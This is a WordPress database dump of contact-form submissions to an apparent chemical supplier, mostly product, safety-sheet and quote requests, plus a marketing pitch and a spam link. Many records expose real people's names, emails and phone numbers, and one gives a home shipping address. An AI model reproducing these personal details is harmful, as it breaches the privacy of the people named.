INSERT INTO `wp_postmeta` VALUES (35152, 3927, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35153, 3927, '_field_1', 'Steve Nguyen'); 
INSERT INTO `wp_postmeta` VALUES (35154, 3927, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (35155, 3927, '_field_2', 'nguyensteve@yahoo.com'); 
INSERT INTO `wp_postmeta` VALUES (35156, 3927, '_field_8', '(858) 397-3632'); 
INSERT INTO `wp_postmeta` VALUES (35157, 3927, '_field_3', 'Hello Customer Service,\r\n\r\nI am interest in the product GPL 205 and GPL 225 for testing.\r\n\r\nIs there a way that you can send me sample for testing? Application would be in small gear / brass / AL / metal , Marine application.\r\n\r\nI would be greatly appropriated if there are sample that you could send me. \r\n\r\nthank you very much in advance.\r\n\r\nmy shipping address:\r\nSteve Nguyen\r\n4861 Gateway Garden Dr\r\nBoynton Beach, FL 33436\r\n\r\nThanks,\r\nSteve Nguyen\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (35158, 3927, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35159, 3927, '_sub_id', '3927'); 
INSERT INTO `wp_postmeta` VALUES (35160, 3928, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (35161, 3928, '_seq_num', '263'); 
INSERT INTO `wp_postmeta` VALUES (35162, 3928, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35163, 3928, '_field_12', 'Lori Frye'); 
INSERT INTO `wp_postmeta` VALUES (35164, 3928, '_field_13', 'CSC, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (35165, 3928, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (35166, 3928, '_field_14', 'lfrye@csc-inc.cc'); 
INSERT INTO `wp_postmeta` VALUES (35167, 3928, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (35168, 3928, '_field_16', 'I would like the Safety Data Sheet for MS-122DF.  I could not find MS-122DF on your SDS webpage.  \r\nHas this product been discontinued?\r\nThank you.\r\nLori Frye'); 
INSERT INTO `wp_postmeta` VALUES (35169, 3928, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (35170, 3928, '_sub_id', '3928'); 
INSERT INTO `wp_postmeta` VALUES (35171, 3929, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35172, 3929, '_seq_num', '491'); 
INSERT INTO `wp_postmeta` VALUES (35173, 3929, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35174, 3929, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35175, 3929, '_field_1', 'Marlene Garcia'); 
INSERT INTO `wp_postmeta` VALUES (35176, 3929, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (35177, 3929, '_field_2', 'edwin_cutler@yahoo.com'); 
INSERT INTO `wp_postmeta` VALUES (35178, 3929, '_field_8', '(956) 400-5945'); 
INSERT INTO `wp_postmeta` VALUES (35179, 3929, '_field_3', 'Deliver not your words by number but by weight.\r\n'); 
INSERT INTO `wp_postmeta` VALUES (35180, 3929, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35181, 3929, '_sub_id', '3929'); 
INSERT INTO `wp_postmeta` VALUES (35182, 3930, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35183, 3930, '_seq_num', '492'); 
INSERT INTO `wp_postmeta` VALUES (35184, 3930, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35185, 3930, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35186, 3930, '_field_1', 'susan lewandowski'); 
INSERT INTO `wp_postmeta` VALUES (35187, 3930, '_field_10', 'Mersen USA Rochester, NY'); 
INSERT INTO `wp_postmeta` VALUES (35188, 3930, '_field_2', 'susan.lewandowski@mersen.com'); 
INSERT INTO `wp_postmeta` VALUES (35189, 3930, '_field_8', '(585) 784-2574'); 
INSERT INTO `wp_postmeta` VALUES (35190, 3930, '_field_3', 'Hello:\n\nPlease provide pricing and lead time for 1 quart of each\n#828 shell epon resin\n#3125 shell epicure\nThank you\n'); 
INSERT INTO `wp_postmeta` VALUES (35191, 3930, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35192, 3930, '_sub_id', '3930'); 
INSERT INTO `wp_postmeta` VALUES (35193, 3931, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35194, 3931, '_seq_num', '493'); 
INSERT INTO `wp_postmeta` VALUES (35195, 3931, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35196, 3931, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35197, 3931, '_field_1', 'eslam'); 
INSERT INTO `wp_postmeta` VALUES (35198, 3931, '_field_10', 'khaled trade'); 
INSERT INTO `wp_postmeta` VALUES (35199, 3931, '_field_2', 'khaled-trade2@outlook.com'); 
INSERT INTO `wp_postmeta` VALUES (35200, 3931, '_field_8', '(054) 921-3061'); 
INSERT INTO `wp_postmeta` VALUES (35201, 3931, '_field_3', 'CLEANER,CONTACT,HYDROCARBON MIXTU,12 TO\r\nCLEANER,INDUSTRIAL:\r\nCLEANER TYPE:\r\nCONTACT;\r\nCLEANING AGENT NAME:\r\nHYDROCARBON MIXTU;\r\nCONTAINER:\r\n12 TO 16 OZ AEROSOL CAN;\r\nADDITIONAL DATA:\r\nITEM ADDITIONAL DESCRIPTION: LIQUID, N\r\nON-CONDUCTIVE; 0.7 TO 0.8 SPECIFIC GRAV\r\nITY MUST NOT ATTACK PLASTIC, RUBBER OR\r\nMETAL; WILL NOT STAIN OR LEAVE ANY RESI\r\nDUE ON CONTACTS; SYSTEM PARENT EQUIPME\r\nNT INFORMATION: FOR ELECTRONIC CIRCUIT\r\nS, PCB&#039;S, PRECISION RELAYS AND CONTACTO\r\nRS ETC; SHOULD REMOVE CONTAMINANTS, OIL\r\n, FINGER PRINTS, TAR, CARBON AND DIRT D\r\nEPOSITS FROM CONTACTS AND PLACES WHERE\r\nAPPROACH IS DIFFICULT. SUPERSOLVE AS\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nP/N#MS-230/CO2\r\nqty 1000\r\nplease give this order price to can buying them ... thank you too much'); 
INSERT INTO `wp_postmeta` VALUES (35202, 3931, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35203, 3931, '_sub_id', '3931'); 
INSERT INTO `wp_postmeta` VALUES (35206, 3933, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (35207, 3933, '_seq_num', '264'); 
INSERT INTO `wp_postmeta` VALUES (35208, 3933, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35209, 3933, '_field_12', 'Mary Kankoski'); 
INSERT INTO `wp_postmeta` VALUES (35210, 3933, '_field_13', 'Transportation Control Systems, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (35211, 3933, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (35212, 3933, '_field_14', 'mary.tcs5@comcast.net'); 
INSERT INTO `wp_postmeta` VALUES (35213, 3933, '_field_15', '(412) 820-9111'); 
INSERT INTO `wp_postmeta` VALUES (35214, 3933, '_field_16', 'Please send the SAFETY DATA SHEET for PTFE RELEASE AGENT/DRY Lubricant - MS-122XD (DPMS-Z0612A).\r\nNeeded for ISO 9001\r\nSend to mary.tcs5@comcast.net\r\nThank you!'); 
INSERT INTO `wp_postmeta` VALUES (35215, 3933, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (35216, 3933, '_sub_id', '3933'); 
INSERT INTO `wp_postmeta` VALUES (35217, 3934, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35218, 3934, '_seq_num', '494'); 
INSERT INTO `wp_postmeta` VALUES (35219, 3934, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35220, 3934, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35221, 3934, '_field_1', 'Luni Evans'); 
INSERT INTO `wp_postmeta` VALUES (35222, 3934, '_field_10', 'Smarter Tactics'); 
INSERT INTO `wp_postmeta` VALUES (35223, 3934, '_field_2', 'lunievanssmartertactics@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (35224, 3934, '_field_8', '087722-81545'); 
INSERT INTO `wp_postmeta` VALUES (35225, 3934, '_field_3', 'HI,\r\n\r\nFrom what I can tell, you are doing a lot of great marketing, but around 98 per cent of leads to your website are leaving without taking any action on your site. I can show you how, through reverse IP lookup, we can identify the companies and individuals visiting your site. I can also provide you with the contact info - including names, emails and phone numbers - of these visitors, effectively doubling or tripling the number of leads that can be harvested from your existing web traffic.\r\n\r\nMy team has over twelve years of experience driving results for our clients, and we want you to be a part of their long reputation for success. We&#039;re based in Los Angeles, we&#039;re Google partners, and we&#039;ve received accolades from Inc Magazine and the LA Business Journal. \r\n\r\nIs there a time this week that works best to set up a call?\r\n\r\nAll the best,\r\n\r\nLuni Evans\r\nDigital Marketing Manager\r\n(877) 228-1545\r\nSmarter Tactics\r\nDigital Marketing | AdWords Management | Content &amp; Social | Influencer Marketing'); 
INSERT INTO `wp_postmeta` VALUES (35226, 3934, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35227, 3934, '_sub_id', '3934'); 
INSERT INTO `wp_postmeta` VALUES (35228, 3935, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35229, 3935, '_seq_num', '495'); 
INSERT INTO `wp_postmeta` VALUES (35230, 3935, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35231, 3935, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35232, 3935, '_field_1', 'Ryan Haberstroh'); 
INSERT INTO `wp_postmeta` VALUES (35233, 3935, '_field_10', 'Honeywell'); 
INSERT INTO `wp_postmeta` VALUES (35234, 3935, '_field_2', 'rhaberstroh@kcp.com'); 
INSERT INTO `wp_postmeta` VALUES (35235, 3935, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (35236, 3935, '_field_3', 'I would like a list of mold release options for molding Silicone DC745U that does not contain PTFE or other Fluoropolymer. '); 
INSERT INTO `wp_postmeta` VALUES (35237, 3935, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35238, 3935, '_sub_id', '3935'); 
INSERT INTO `wp_postmeta` VALUES (35239, 3936, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35240, 3936, '_seq_num', '496'); 
INSERT INTO `wp_postmeta` VALUES (35241, 3936, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35242, 3936, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35243, 3936, '_field_1', 'SHAVEZ AHMED'); 
INSERT INTO `wp_postmeta` VALUES (35244, 3936, '_field_10', 'NATIONAL SUPPLIES COMPANY'); 
INSERT INTO `wp_postmeta` VALUES (35245, 3936, '_field_2', 's.ahmed@n-supplies.com'); 
INSERT INTO `wp_postmeta` VALUES (35246, 3936, '_field_8', '(059) 261-9332'); 
INSERT INTO `wp_postmeta` VALUES (35247, 3936, '_field_3', 'Dear Sir\r\n                Please provide your best air cargo price( DAM MAM-K.S.A) for the supply of the following,,,,,,,an early response i would be verry appreciated to you.,,\r\n\r\n\r\n\r\n1-VISCOSITY RATING: OIL,ANALYSIS STANDARDS:CALIBRATION,75 CS OIL,ANALYSIS STANDARDS: ELEMENT: CALIBRATION; 75 CS; ADDITIONAL DATA: P N# CS-75-500 STANDARD OIL 75 BASE 500 ML GRAPHITE DISC ELECTRODES BOX= 500 PC S. MNF. : MILLER STEPHENSON CHEMICAL CO . A SUBSTANCE USED FOR CALIBRATION AND VERIFICATION STANDARDS FOR THE ANALYSI S OF LUBRICANT ADDITIVES, NEW AND IN-S ERVICE LUBRICANTS, PETROLEUM PRODUCTS AND ORGANIC FLUIDS MATERIALS. MILLER STEPHENSON CHEMICAL CO.: P/N#CS-75-500\r\n\r\nQUANTITY,,,,10 BOT EACH\r\n\r\n\r\n2-OIL,ANALYSIS STANDARDS:ANALYTICAL OIL FO OIL,ANALYSIS STANDARDS: VISCOSITY RATING: CS-GT-15-100 ; STANDARD/SPECIFICATION: ANALYTICAL OIL FOR OIL STANDARD; ADDITIONAL DATA: P N# CS-GT-15-100-200G CALIBRATION STAN DARD OIL CS-GT-15-100-200G 100PPM,250 M L, 8OZ GRAPHITE DISC ELECTRODES BOX= 50 0 PCS. MNF.: MILLER STEPHENSON CHEMICAL CO. CALIBRATION STANDARD OIL CS-GT-15 -10-200G FOR SPECTROIL MODEL M INSTRUME NT MILLER STEPHENSON CHEMICAL CO.: P/N#CS-GT-15-100-200 G\r\n\r\nQUANTITY,,,5 BOT EACH\r\n\r\n\r\n3-OIL:ANALYSIS STANDARDS,OIL CALIBRATION,C OIL,ANALYSIS STANDARDS: ELEMENT: OIL CALIBRATION; VISCOSITY RATING: CS-24-100 ; STANDARD/SPECIFICATION: CALIBRATION STANDARD OIL; ADDITIONAL DATA: P N# CS-24-100-200G CALIBRATION STANDA RD CS24 100PPM 200G GRAPHITE DISC ELEC TRODES BOX= 500 PCS. MNF.: MILLER STE PHENSON CHEMICAL CO. CALIBRATION STAND ARD OIL FOR SPECTROIL MODEL M INSTRUMEN T MILLER STEPHENSON CHEMICAL CO.: P/N#CS-24-100-200 G \r\n\r\nQUANTITY,,,,5 BOT EACH\r\n\r\n\r\n4-OIL,ANALYSIS STANDARDS:CALIBRATION STAND OIL,ANALYSIS STANDARDS: VISCOSITY RATING: SMA-900 ; STANDARD/SPECIFICATION: CALIBRATION STANDARD OIL; ADDITIONAL DATA: P N# SMA-900-200G STANDARD OIL SMA-900 - 200G MNF:MILLER STEPHENSON CHEMICAL CO . CALIBRATION STANDARD OIL FOR SPECTRO IL MODEL M INSTRUMENT MILLER STEPHENSON CHEMICAL CO.: P/N#SMA-900-200 G\r\n\r\nQUANTITY,,,,3 BOT EACH\r\n\r\n\r\n5-PIPET,LABORATORY:8 ML PIPET,LABORATORY: CAPACITY: 8 ML; ADDITIONAL DATA: DISPOSABLE PIPETTES TRANSFER 8 ML SIZE: 4.5&quot; X 5.8&quot; P N # M99914 PIPETTES TRAN SFER 8 ML 400 BOX FOR SPECTROIL MODEL M INSTRUMENT MILLER STEPHENSON CHEMICAL CO.: P/N#M99914\r\n\r\nQUANTITY,,,,5 BOX EACH\r\n\r\n\r\n6-ANALYZER,DIRECT PURCHASE:N/A ANALYZER,DIRECT PURCHASE: TYPE: N/A; ADDITIONAL DATA: WATER ANALYSIS CAPABILITY WITHIN TWO MO NTHS PROGRAM &amp; CALIBRATION. THE ELEMENT S INCLUDED IN THE WATER ANALYSIS CAPABI LITY ARE CA, FE, MG, SI, NA, LI, AND K P N : M99917 SPECTRO - USA BASIC SPECTRO ELECTRIC INDUSTRY INC: P/N#M99917\r\n\r\nQUANTITY,,,,1 EACH\r\n\r\n\r\n7-CLEANER,DIRECT PURCHASE: 2OZ,LIQUID,SOLUT CLEANER,DIRECT PURCHASE: TYPE: SOLUTION; FORM: LIQUID; CONTAINER: 2OZ; ADDITIONAL DATA: P N# M99915 WINDOW CLEANER SOLUTION, 2 OZ. BOTTLE MNF.:MILLER STEPHENSON CHEMI CAL CO. WINDOW CLEANER 2 OZ BOTTLE FOR SPECTROIL MODEL M INSTRUMENT MILLER STEPHENSON CHEMICAL CO.: P/N#M99915 \r\n\r\nQUANTITY,,,,20 BOT EACH\r\n\r\n\r\n8-SOLVENT,DIRECT PURCHASE:22 OZ,ELECTRON SOLVENT,DIRECT PURCHASE: TYPE: ELECTRON; COMPOSITION: 22 OZ; ADDITIONAL DATA: P N# M97102 ELECTRON SOLVENT, 22OZ. SPE CTRO M97102 , USA BASIC , 22 OZ SIZE: 4 . 5&quot; X 5.8&quot; MNF.:MILLER STEPHENSON CHEMI CAL CO. MILLER STEPHENSON CHEMICAL CO.: P/N#M97102\r\n\r\nQUANTITY,,,20 BOT EACH\r\n\r\n\r\n9-WATER,DIRECT PURCHASE:BTL,HPLC GRADE 500 WATER,DIRECT PURCHASE: TYPE: HPLC GRADE 500MI; CONTAINER: BTL; ADDITIONAL DATA: STANDARD WATER HPLC GRADE 500MI P N # W 1089P MILLER STEPHENSON CHEMICAL CO. MILLER STEPHENSON CHEMICAL CO.: P/N#W1089 P\r\n\r\nQUANTITY,,,,2 BOT EACH\r\n\r\n\r\n10-WATER,DIRECT PURCHASE:BTL, 5PPM 500MI WATER,DIRECT PURCHASE: TYPE: 5PPM 500MI; CONTAINER: BTL; ADDITIONAL DATA: STANDARD WATER 5 ELEMENT 5 PPM 500MI P N# STE005 MNF. : MILLER STEPHENSON CHEM ICAL CO. MILLER STEPHENSON CHEMICAL CO.: P/N#STE005\r\n\r\nQUANTITY,,,,2 BOT EACH\r\n\r\n\r\n11-ELECTRODE,DIRECT PURCHASE:M INSTRUMENT ELECTRODE,DIRECT PURCHASE: TYPE: M INSTRUMENT; ADDITIONAL DATA: ROUTINE MAINTENANCE KIT SPECTROIL M P N# M96013A MNF. :MILLER STEPHENSON CHEM ICAL CO. MILLER STEPHENSON CHEMICAL CO.: P/N#M96013 A\r\n\r\nQUANTITY,,,1 KIT EACH\r\n\r\n\r\n\r\n\r\n\r\nThanks &amp; Best Regards\r\n\r\n\r\n\r\nShavez Ahmed\r\nSales &amp; Marketing Executive\r\nNational Supplies Company\r\nPhone: 966 3- 896 6677\r\nFax   :  966 3 896 6688\r\nEmail: s.ahmed@n-supplies.com '); 
INSERT INTO `wp_postmeta` VALUES (35248, 3936, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35249, 3936, '_sub_id', '3936'); 
INSERT INTO `wp_postmeta` VALUES (35250, 3937, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35251, 3937, '_seq_num', '497'); 
INSERT INTO `wp_postmeta` VALUES (35252, 3937, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35253, 3937, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35254, 3937, '_field_1', 'Edmund Gao'); 
INSERT INTO `wp_postmeta` VALUES (35255, 3937, '_field_10', 'Luoyang Shenyu Molybdenum Co., Ltd'); 
INSERT INTO `wp_postmeta` VALUES (35256, 3937, '_field_2', 'symoly.3@lcsymy.com'); 
INSERT INTO `wp_postmeta` VALUES (35257, 3937, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (35258, 3937, '_field_3', 'Shenyu Moly is a subsidiary of China Moly. Our main product is MoS2 powder for production of grease. If you are interested, please contact us. We can provide high quality MoS2 at first-hand good price because we have our own moly mining field and MoS2 manufacturing factory.'); 
INSERT INTO `wp_postmeta` VALUES (35259, 3937, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35260, 3937, '_sub_id', '3937'); 
INSERT INTO `wp_postmeta` VALUES (35261, 3938, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35262, 3938, '_seq_num', '498'); 
INSERT INTO `wp_postmeta` VALUES (35263, 3938, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35264, 3938, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35265, 3938, '_field_1', 'Aneeq Ahmad'); 
INSERT INTO `wp_postmeta` VALUES (35266, 3938, '_field_10', 'INAT group'); 
INSERT INTO `wp_postmeta` VALUES (35267, 3938, '_field_2', 'inatt.aneeqahmad@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (35268, 3938, '_field_8', '(966) 530-5779'); 
INSERT INTO `wp_postmeta` VALUES (35269, 3938, '_field_3', 'Dear Sir/Madam,\r\n\r\nKindly provide your best offer for required specification below along with Technical datasheet/Product brochure(Mandatory for technical review) ;\r\nAlso offer us Shipping charges with reference to address &quot;Unayzah St. cross 19th Al-Arabiya, 31952 Al-Khobar, Saudi Arabia&quot;.\r\nBid Close Date:       APR 12, 2017.\r\n\r\n \r\n\r\nRFQ# 01\r\n\r\n \r\n\r\nOur Ref No: INAT-909300078\r\n\r\nQTY:  05 BOT         \r\n\r\nOIL, ANALYSIS STANDARDS: ANALYTICAL OIL FO\r\n\r\nOIL, ANALYSIS STANDARDS:\r\n\r\nVISCOSITY RATING:                                                CS-GT-15-100;\r\n\r\nSTANDARD/SPECIFICATION:                     ANALYTICAL OIL FOR OIL STANDARD;\r\n\r\nADDITIONAL DATA:\r\n\r\nP N# CS-GT-15-100-200G CALIBRATION STANDARD OIL CS-GT-15-100-200G 100PPM, 250ML, 8OZ GRAPHITE DISC ELECTRODES BOX= 500 PCS. MNF: MILLER STEPHENSON CHEMICAL CO. CALIBRATION STANDARD OIL CS-GT-15-10-200G FOR SPECTROIL MODEL M INSTRUMENT\r\n\r\nMILLER STEPHENSON CHEMICAL CO.:\r\n\r\nP/N#CS-GT-15-100-200G\r\n\r\n \r\n\r\nRFQ# 02\r\n\r\n \r\n\r\nOur Ref No: INAT-909300064\r\n\r\nQTY:  05 BOT         \r\n\r\nOIL: ANALYSIS STANDARDS, OIL CALIBRATION, C\r\n\r\nOIL, ANALYSIS STANDARDS:\r\n\r\nELEMENT:                                         OIL CALIBRATION;\r\n\r\nVISCOSITY RATING:                                    CS-24-100;\r\n\r\nSTANDARD/SPECIFICATION:         CALIBRATION STANDARD OIL;\r\n\r\nADDITIONAL DATA:\r\n\r\nP N# CS-24-100-200G CALIBRATION STANDARD CS24 100PPM 200G GRAPHITE DISC ELECTRODES BOX= 500 PCS. MNF: MILLER STEPHENSON CHEMICAL CO. CALIBRATION STANDARD OIL FOR SPECTROIL MODEL M INSTRUMENT\r\n\r\nMILLER STEPHENSON CHEMICAL CO.:\r\n\r\nP/N#CS-24-100-200G\r\n\r\n \r\n\r\nRFQ# 03\r\n\r\n \r\n\r\nOur Ref No: INAT-909300065\r\n\r\nQTY:  03 BOT         \r\n\r\nOIL, ANALYSIS STANDARDS: CALIBRATION STAND\r\n\r\nOIL, ANALYSIS STANDARDS:\r\n\r\nVISCOSITY RATING:                                    SMA-900;\r\n\r\nSTANDARD/SPECIFICATION:         CALIBRATION STANDARD OIL;\r\n\r\nADDITIONAL DATA:\r\n\r\nP N# SMA-900-200G STANDARD OIL SMA-900-200G MNF: MILLER STEPHENSON CHEMICAL CO. CALIBRATION STANDARD OIL FOR SPECTROIL MODEL M INSTRUMENT\r\n\r\nMILLER STEPHENSON CHEMICAL CO.:\r\n\r\nP/N#SMA-900-200G\r\n\r\n \r\n\r\nRFQ# 04\r\n\r\n \r\n\r\nOur Ref No: INAT-902504283\r\n\r\nQTY:  20 BOX         \r\n\r\nWIPE: PERSONAL, 4.5 IN WD X 8.4 IN LG, 280\r\n\r\nWIPE, PERSONAL:\r\n\r\nSIZE:                                                   4.5 IN WD X 8.4 IN LG;\r\n\r\nPACKING:                                          280 SHEET PER BOX;\r\n\r\nADDITIONAL DATA:\r\n\r\nITEM ADDITIONAL DESCRIPTION: FOR SPECTROIL, DISPOSABLE, PAPER, 280 SHEET BOX, FOR SPECTROMETER INSTALLED IN ALBAHAPOWER STATION.\r\n\r\nKIMBERLY-CLARK CORPORATION:\r\n\r\nP/N#M99913\r\n\r\nSPECTRO:\r\n\r\nP/N#M99913\r\n\r\n \r\n\r\nRFQ# 05\r\n\r\n \r\n\r\nOur Ref No: INAT-909300071\r\n\r\nQTY:  05 BOX         \r\n\r\nPIPET, LABORATORY: 8 ML\r\n\r\nPIPET, LABORATORY:\r\n\r\nCAPACITY:                                        8 ML;\r\n\r\nADDITIONAL DATA:\r\n\r\nDISPOSABLE PIPETTES TRANSFER 8 ML SIZE: 4.5&quot; X 5.8&quot; P N # M99914 PIPETTES TRANSFER 8 ML 400 BOX FOR SPECTROIL MODEL M INSTRUMENT\r\n\r\nMILLER STEPHENSON CHEMICAL CO.:\r\n\r\nP/N#M99914\r\n\r\nOR ANY EQUIVALENT MANUFACTURER/PRODUCT COMPETING/PERFORMING THE SAME.\r\nPlease fill details of your quote below;\r\n\r\n\r\n1.\r\nUnit Price:\r\n \r\n2.\r\nPrice Validity:\r\n \r\n3.\r\nEstimated Delivery Time:\r\n4.\r\nShipment Costs:\r\n5.\r\nEstimated Gross Weight and Dimensions/Packing:\r\n \r\n6.\r\nManufacturer Name:\r\n \r\n7.\r\nModel or Part Number:\r\n \r\n8.\r\nCountry of Origin:\r\n \r\nIMPORTANT NOTES:\r\n1.     Each inquiry sent to you is independent.\r\n2.     Consider the tough competition of prices.\r\n3.     Appropriate alternate solutions are also considered as solution.\r\n4.   Please refer to OUR INQUIRY REFERENCE while replying for quote. \r\n5.   It is mandatory to submit Product Brochure/Technical catalogs in case of Alternate Solution, Without it your quotation considers invalid.\r\nBest Regards,\r\nMr. Aneeq Ahmad | Trading Assistant | Material Management – Trading Department | EMEA Region | INAT |\r\nDirect: +92-336-632-7971  | Email:  inatt.aneeqahmad@gmail.com\r\n \r\nINAT - INTERNATIONAL AGENT GROUP\r\nTRADING, INSPECTION, TESTING, CONTRACTING, NDT, CALIBRATION\r\n \r\nDirect: + 966-3-893 3250 Ext 106 | Fax: +966-3-864 3351 | Email: pak.coordinator@inatt.com | Site: www.inatt.com | \r\nPak Office: M Block 198 | Ex Air Avenue, DHA PHASE VIII | Lahore | Punjab | Pakistan | \r\nHead Office: INAT GROUP | P.O.Box-30060 | Al-Khobar-31952 | Eastern Province | Kingdom of Saudi Arabia |'); 
INSERT INTO `wp_postmeta` VALUES (35270, 3938, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35271, 3938, '_sub_id', '3938'); 
INSERT INTO `wp_postmeta` VALUES (35272, 3939, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35273, 3939, '_seq_num', '499'); 
INSERT INTO `wp_postmeta` VALUES (35274, 3939, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35275, 3939, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35276, 3939, '_field_1', 'BrosoaLZ'); 
INSERT INTO `wp_postmeta` VALUES (35277, 3939, '_field_10', 'google'); 
INSERT INTO `wp_postmeta` VALUES (35278, 3939, '_field_2', 'koltso.vsevlastia@yandex.com'); 
INSERT INTO `wp_postmeta` VALUES (35279, 3939, '_field_8', '83381746597'); 
INSERT INTO `wp_postmeta` VALUES (35280, 3939, '_field_3', 'Tim McGraw is a famous country singer, so don&#039;t miss the possibility to visit &lt;a href=&quot;http://timmcgrawtourtickets.com/&quot; /&gt;Tim McGraw baltimore 2017&lt;/a&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35281, 3939, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35282, 3939, '_sub_id', '3939'); 
INSERT INTO `wp_postmeta` VALUES (35283, 3940, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35284, 3940, '_seq_num', '500'); 
INSERT INTO `wp_postmeta` VALUES (35285, 3940, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35286, 3940, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35287, 3940, '_field_1', 'Brian Tussey'); 
INSERT INTO `wp_postmeta` VALUES (35288, 3940, '_field_10', 'Applied Research Laboratory / Penn State'); 
INSERT INTO `wp_postmeta` VALUES (35289, 3940, '_field_2', 'bct1@arl.psu.edu'); 
INSERT INTO `wp_postmeta` VALUES (35290, 3940, '_field_8', '(814) 863-2317'); 
INSERT INTO `wp_postmeta` VALUES (35291, 3940, '_field_3', '1 gallon of 828 resin, 8132 resin, or Epicure 3140 may last us several years. We need to know approximate expiration dates. How do we interpret your date codes and what would the expected shelf life be for Epicure 3140 (LL4J0006/2405), Hexion 828 resin (DP6B1612/1556GG), and Hexion 8132 resin (DP4E190/2585GG)?\nThank you,\nBrian\n'); 
INSERT INTO `wp_postmeta` VALUES (35292, 3940, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35293, 3940, '_sub_id', '3940'); 
INSERT INTO `wp_postmeta` VALUES (35294, 3942, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35295, 3942, '_seq_num', '501'); 
INSERT INTO `wp_postmeta` VALUES (35296, 3942, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35297, 3942, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35298, 3942, '_field_1', 'Terry McGraner'); 
INSERT INTO `wp_postmeta` VALUES (35299, 3942, '_field_10', 'Dana'); 
INSERT INTO `wp_postmeta` VALUES (35300, 3942, '_field_2', 'terry.mcgraner@dana.com'); 
INSERT INTO `wp_postmeta` VALUES (35301, 3942, '_field_8', ''); 
